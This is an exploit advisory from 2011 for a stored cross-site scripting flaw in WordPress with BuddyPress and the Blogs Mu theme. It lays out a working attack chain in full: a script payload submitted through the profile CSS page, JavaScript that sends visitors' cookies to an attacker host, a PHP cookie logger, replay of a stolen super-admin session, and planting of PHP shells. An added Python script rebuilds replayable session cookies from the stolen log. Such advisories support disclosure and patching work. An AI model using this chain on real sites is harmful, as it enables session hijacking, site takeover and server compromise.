WordPress + Buddypress + Blogs Mu Theme Cross Site Scripting

Posted Sep 25, 2011
Authored by knull | Site leethack.info

WordPress with Buddypress and Blogs Mu Theme suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | cdc514f2e390d0fb253eaff6f745da7c608e34926bb03c0bcb321ab265c56eac

Wordpress + Buddypress + Blogs Mu theme = XSS to Super Admin to Server Compromise
----------------------------------------------------------------------------------

Cross-site scripting (XSS) vulnerabilities tend to be seen as one of the less serious classes of security issue. Sometimes XSS is serious and can lead to complete server compromise, as the chain described below shows.

Severity: High

Vulnerable setup:
PHP<=5.2 (tested on CentOS 5), Wordpress<=3.1.4, Buddypress<=1.2.10 (with bbPress forum integrated), Blogs Mu theme<=1.2.6

Victim box's IP:
192.168.0.11

Attacker box's IP:
192.168.0.4

By registering on the Wordpress site as a regular 'subscriber' (here 'regularuser' is used as the username) and then signing in, it is possible to submit the
following javascript through the profile CSS settings page, http://192.168.0.11/members/regularuser/settings/profile-css/ in this test (the page is also reachable from the theme's bar at the top of the page). The theme stores the submission and renders it on the user's public profile:

<script>
// Exfiltrates the viewer's page title and cookies to the attacker's box (192.168.0.4).
// The browser sends the cross-origin GET even though the response cannot be read.
var http = new XMLHttpRequest();
var url = "http://192.168.0.4/xss.php?" + "t=" +
encodeURI(top.document.title) + "&c=" + encodeURI(document.cookie);
http.open("GET", url);
http.send();
</script>

The xss.php script on the attacker's box looks as follows; it simply appends the page title and cookies
of whichever user visits the
http://192.168.0.11/members/regularuser/profile/ page to a log file (social engineering can be used to get particular users to visit this page):

<?php
// Attacker-side logger: appends one line per visitor to cookies/cookies.txt
// (the directory must be writable by the web server).
$usercookies = fopen('cookies/cookies.txt', 'a');
// 't' is the victim's page title, 'c' the victim's document.cookie; both arrive URL-encoded from the payload.
fwrite($usercookies, "Site|Username|Page: " . urldecode($_GET['t']) .
"\t" . "Cookie: " . urldecode($_GET['c']) . "\n");
fclose($usercookies);
?>

Opening the 'cookies/cookies.txt' file reveals the following
entry (written after the Wordpress super administrator has signed in and then
viewed the public profile of 'regularuser'; the title and the Cookie field are separated by a tab in the file):

Site|Username|Page: test site | regularuser | Profile Cookie:
wordpress_test_cookie=WP Cookie check;
wordpress_logged_in_726e7da47eca03ddcae3e5e5966ad0d1=admin|1316627756|7c845a1bcf61927d4572ae0836ad7df4

By signing in as 'regularuser' and then replacing the value of his own 'wordpress_logged_in_726e7da47eca03ddcae3e5e5966ad0d1' cookie with
'admin|1316627756|7c845a1bcf61927d4572ae0836ad7df4', the attacker completely compromises the Buddypress components of the Wordpress installation: he is effectively signed in as the super administrator and can do anything the administrator can do via Buddypress (for example, sending messages to all users of the Wordpress site). The cookie replays until the expiration timestamp embedded in it (the middle field, 1316627756) passes.
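The following Python script is an added example, not part of the original advisory or of any of the projects it names. It parses the cookies.txt format written by the xss.php logger above, pulls out the wordpress_logged_in_* cookie, decodes its WordPress 3.x layout (username|expiration|hmac, which is assumed here), reports which captured sessions are still replayable at a given time, and rebuilds the Cookie header value the attacker would present. The log content embedded in the script is constructed to mirror the advisory's entry, with a second line for a visitor who was not logged in.

```python
import re
from datetime import datetime, timezone

# Constructed sample of cookies.txt as written by the xss.php logger:
# page title, a tab, then the raw document.cookie string. Second line: an
# anonymous visitor, who only carries the WordPress test cookie.
SAMPLE_LOG = (
    "Site|Username|Page: test site | regularuser | Profile\t"
    "Cookie: wordpress_test_cookie=WP Cookie check; "
    "wordpress_logged_in_726e7da47eca03ddcae3e5e5966ad0d1="
    "admin|1316627756|7c845a1bcf61927d4572ae0836ad7df4\n"
    "Site|Username|Page: test site | regularuser | Profile\t"
    "Cookie: wordpress_test_cookie=WP Cookie check\n"
)

LINE_RE = re.compile(r"^Site\|Username\|Page: (?P<title>.*?)\tCookie: (?P<cookies>.*)$")
# WordPress names the cookie wordpress_logged_in_<md5 of the site URL>.
LOGGED_IN_RE = re.compile(r"^wordpress_logged_in_[0-9a-f]{32}$")


def parse_cookie_string(raw):
    """Split a document.cookie string ('a=1; b=2') into a name -> value dict."""
    jar = {}
    for part in raw.split(";"):
        part = part.strip()
        if "=" in part:
            name, value = part.split("=", 1)
            jar[name] = value
    return jar


def decode_logged_in(name, value):
    """Decode a WP 3.x logged_in cookie (assumed layout: username|expiration|hmac)."""
    fields = value.split("|")
    if len(fields) != 3 or not fields[1].isdigit():
        return None
    return {
        "cookie_name": name,
        "username": fields[0],
        "expires": int(fields[1]),
        "hmac": fields[2],
    }


def parse_log(text):
    """One record per log line: title, cookie dict, and decoded session (or None)."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the logger's format
        jar = parse_cookie_string(m.group("cookies"))
        session = None
        for name, value in jar.items():
            if LOGGED_IN_RE.match(name):
                session = decode_logged_in(name, value)
        records.append({"title": m.group("title"), "cookies": jar, "session": session})
    return records


def replayable_sessions(records, now):
    """Sessions whose embedded expiration is still in the future at Unix time `now`."""
    return [r["session"] for r in records if r["session"] and r["session"]["expires"] > now]


def expires_iso(session):
    """Human-readable UTC expiry of a decoded session."""
    return datetime.fromtimestamp(session["expires"], tz=timezone.utc).isoformat()


def cookie_header(session):
    """Rebuild the Cookie header value that replays the captured session."""
    return "%s=%s|%d|%s" % (
        session["cookie_name"], session["username"], session["expires"], session["hmac"]
    )


if __name__ == "__main__":
    for rec in parse_log(SAMPLE_LOG):
        if rec["session"]:
            print(rec["session"]["username"], "expires", expires_iso(rec["session"]))
        else:
            print("no logged_in cookie for a visitor of:", rec["title"])
```

Running it against a real cookies.txt replaces SAMPLE_LOG with the file's contents; the expiry decoding is what tells the attacker (or the incident responder reviewing a recovered log) how long each captured cookie stays usable.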

Further, it is possible to completely compromise the Wordpress installation by then going to:

http://192.168.0.11/members/admin/settings/general/

And changing the administrator password, after which going to:

http://192.168.0.11/wp-admin/

Allows the attacker to control the whole Wordpress site as the super administrator, without even entering the new password: Wordpress re-issues the authentication cookies for the current user when that user's password is changed, so the attacker's browser now holds valid wp-admin cookies as well.

By editing PHP files within the Wordpress directory tree, PHP shells or backdoors can be added, compromising the server.

To defend against this, upgrade outdated installations of Wordpress, Buddypress and the Blogs MU theme (per the timeline below, Buddypress 1.5 and Blogs Mu 1.2.7 contain the fixes).

Timeline:

19 September 2011: vendor notified.
<=23 September 2011: Buddypress updated to 1.5 and Blogs Mu theme updated to 1.2.7, issues fixed.
